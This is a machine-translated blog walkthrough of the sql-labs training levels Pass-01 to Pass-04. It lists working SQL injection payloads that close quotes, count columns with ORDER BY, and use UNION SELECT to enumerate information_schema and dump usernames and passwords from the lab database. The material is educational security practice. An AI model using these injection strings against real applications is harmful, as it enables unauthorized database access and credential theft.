当前位置:网站首页>sql-labs
sql-labs
2022-07-02 19:44:00 【Young seed_】
sql-labs
- What is? sql-labs?
- Pass-01,02
- Determine whether there is injection
- Determine the number of fields
- union select The judgment is obviously misplaced ( The echo )
- Library name and login user name
- Name of judgment table
- Judge the listing
- Judgment data
- Quick method ( It should be noted that the id The value must be 0 The following figures , Otherwise, it will not succeed )
- Pass-03
- Pass-04
What is? sql-labs?
SQL Inject (SQL Injection) It happened in Web Security vulnerabilities in the database layer of the program , It is the website that has the most and simplest vulnerabilities . The main reason is that the program does not judge and process the legitimacy of user input data , Cause attackers to be able to Web Predefined in the application SQL Add additional... To the statement SQL sentence , Implement illegal operation without the administrator's knowledge , In this way, the database server is cheated to execute any unauthorized query , So as to further obtain data information
Recommend a video 【 Reprint 】SQL Inject 、SSTI&Docker The escape HTB CTF -GoodGame- Bili, Bili
Pass-01,02
These two things , No bad …
Online inquiries have Pass-01 Based on single quotation marks SQL Inject ,Pass-02 Integer based injection
Determine whether there is injection
use get Pass value id=1, Then you can see the web page changes 
use get Pass value id=2,
use get Pass value id=15 after , The interface is abnormal .
Is it possible to ?id=1, This pass parameter is spliced to SQL In the sentence ? And be regarded as SQL Code execution ?
Try ,?id=1 and 1=2… unchanged .
Pass-02 Knowledge starts from this , Try to close ?id=1’and 1=1-- za( Follow the letter casually …)
Note blank space ( Format ), Otherwise, an error will be reported , Pictured 
?id=1’and 1=2-- zaa, Page exception ( Possible SQL Inject )
Determine the number of fields
Use order by Query all fields , from 1 Start until 4, Find out 3 normal , however 4 The page of is abnormal ( There are three fields )
union select The judgment is obviously misplaced ( The echo )
Input ,?id=1’union select 1,2,3-- zaa, The previous results are shown ,
1,2,3: It's only equivalent to occupying three positions ( previously order by Query as 3), So you can use whatever expression .
So try to id=1, Change it to id=15( Because the page has no result )
Be careful : The article said , It is known that there are only three columns , Find the position of each column , Use ?id=0’ union select 1,2,3 --+ ( It should be noted that the id The value must be 0 The following figures , Otherwise, it will not succeed )
Library name and login user name
take 2 Change your position to database(), Display the database name of the current page :security.
Query the database name and current login user name of the current database , Use ?id=0’ union select 1,database(),user() – zaa
user() displacement 3 The location of , Is the current login user name .
Name of judgment table
?id=15’union select 1,table_name,3 from information_schema.tables where table_schema=‘security’-- zaa
| table_name: Representative table name |
|---|
| information_schema It has its own database |
| table_schema Literally refers to the library name |
Second ( Then the first one can be used limit 0,1 Express )
?id=15’union select 1,table_name,3 from information_schema.tables where table_schema=‘security’ limit 1,1– zaa
Third (limit 1,1 In front of 1 Change it to 2)
namely …?id=15’union select 1,table_name,3 from information_schema.tables where table_schema=‘security’ limit 2,1-- zaa
etc. …
Judge the listing
?id=15’union select 1,column_name,3 from information_schema.columns where table_schema=‘security’ and table_name=‘emails’-- zaa
emails: It can be replaced according to the table 
example :
?id=15’union select 1,column_name,3 from information_schema.columns where table_schema=‘security’ and table_name=‘referers’-- zaa
Judgment data
?id=15’union select 1,id,3 from emails-- zaa
Same as above ,emails: It can be replaced according to the table
Quick method ( It should be noted that the id The value must be 0 The following figures , Otherwise, it will not succeed )
take 2 Change your position to database(), Display database name :security.
Reference article …
Table name
The database will be exploded after the database name , Use ?id=0’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3 --+
The table name is in place in one step …
Name
?id=0’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘emails’),3 --+
emails: It can be replaced according to the table 
Data name
Format ?id=0’ union select 1,(select group_concat(concat_ws(0x7e, The column name corresponding to the table name , The column name corresponding to the table name )) from Table name ),3 --+
0x7e It should be standing …, Its position can also be the column name corresponding to the table name , Observe 02,03
01
?id=0’ union select 1,(select group_concat(concat_ws(0x7e,id,email_id)) from emails),3 --+ Blasting , Get the following .
02
?id=0’ union select 1,(select group_concat(concat_ws(0x7e,username,password)) from users),3 --+ Blasting , Get the following .
03
?id=0’ union select 1,(select group_concat(concat_ws(id,username,password)) from users),3 --+ Blasting , Get the following 
Pass-03
View source code … Found framed . Will not be treated as code , Thus invalidating the code .
thus ’ Add a )
| Determine whether there is injection | ?id=1’)and 1=1-- za |
|---|---|
| Determine the number of fields | ?id=1’)order by 1-- za |
| union select The judgment is obviously misplaced | ?id=1’)union select 1,2,3-- zaa |
| Name of judgment table | ?id=15’)union select 1,table_name,3 from information_schema.tables where table_schema=‘security’-- zaa |
| Judge the listing | ?id=15’)union select 1,column_name,3 from information_schema.columns where table_schema=‘security’ and table_name=‘emails’-- zaa |
| Determine the data name | ?id=15’)union select 1,id,3 from emails-- zaa |
Pass-04
From figure and 03 Compared with single quotation, it becomes double quotation marks …
| Determine whether there is injection | ?id=1")and 1=1-- za |
|---|---|
| Determine the number of fields | ?id=1")order by 1-- za |
| union select The judgment is obviously misplaced | ?id=1")union select 1,2,3-- zaa |
| Name of judgment table | ?id=15")union select 1,table_name,3 from information_schema.tables where table_schema=‘security’-- zaa |
| Judge the listing | ?id=15")union select 1,column_name,3 from information_schema.columns where table_schema=‘security’ and table_name=‘emails’-- zaa |
| Determine the data name | ?id=15")union select 1,id,3 from emails-- zaa |
边栏推荐
- 《重构:改善既有代码的设计》读书笔记(上)
- AcWing 181. 回转游戏 题解(搜索—IDA*搜索)
- AcWing 343. Sorting problem solution (Floyd property realizes transitive closure)
- AcWing 383. 观光 题解(最短路)
- 思考变量引起的巨大变化
- R语言使用econocharts包创建微观经济或宏观经济图、indifference函数可视化无差异曲线(indifference curve)
- AcWing 1125. Cattle travel problem solution (shortest path, diameter)
- AcWing 1125. 牛的旅行 题解(最短路、直径)
- MySQL
- 4274. Suffix expression - binary expression tree
猜你喜欢
搭建哨兵模式reids、redis从节点脱离哨兵集群
良心总结!Jupyter Notebook 从小白到高手,保姆教程来了!
KT148A语音芯片ic的软件参考代码C语言,一线串口
《MongoDB入门教程》第03篇 MongoDB基本概念
RPD product: super power squad nanny strategy
What is the Bluetooth chip ble, how to select it, and what is the path of subsequent technology development
定了,就是它!
嵌入式(PLD) 系列,EPF10K50RC240-3N 可编程逻辑器件
Reading notes of "the way to clean structure" (Part 2)
Build a master-slave mode cluster redis
随机推荐
Windows2008r2 installing php7.4.30 requires localsystem to start the application pool, otherwise 500 error fastcgi process exits unexpectedly
安装单机redis详细教程
450-深信服面经1
Pytorch版本、CUDA版本与显卡驱动版本的对应关系
Gamefi chain game system development (NFT chain game development function) NFT chain game system development (gamefi chain game development source code)
Educational Codeforces Round 129 (Rated for Div. 2) 补题题解
From 20s to 500ms, I used these three methods
After writing 100000 lines of code, I sent a long article roast rust
Solution: vs2017 cannot open the source file stdio h main. H header document [easy to understand]
Bubble sort array
Automatic reading of simple books
Yes, that's it!
Kt148a voice chip IC user end self replacement voice method, upper computer
R language uses econcharts package to create microeconomic or macroeconomic maps, and indifference function to visualize indifference curve
《MongoDB入门教程》第03篇 MongoDB基本概念
KT148A语音芯片ic的开发常见问题以及描述
Dictionaries
rxjs Observable 自定义 Operator 的开发技巧
良心总结!Jupyter Notebook 从小白到高手,保姆教程来了!
《重构:改善既有代码的设计》读书笔记(下)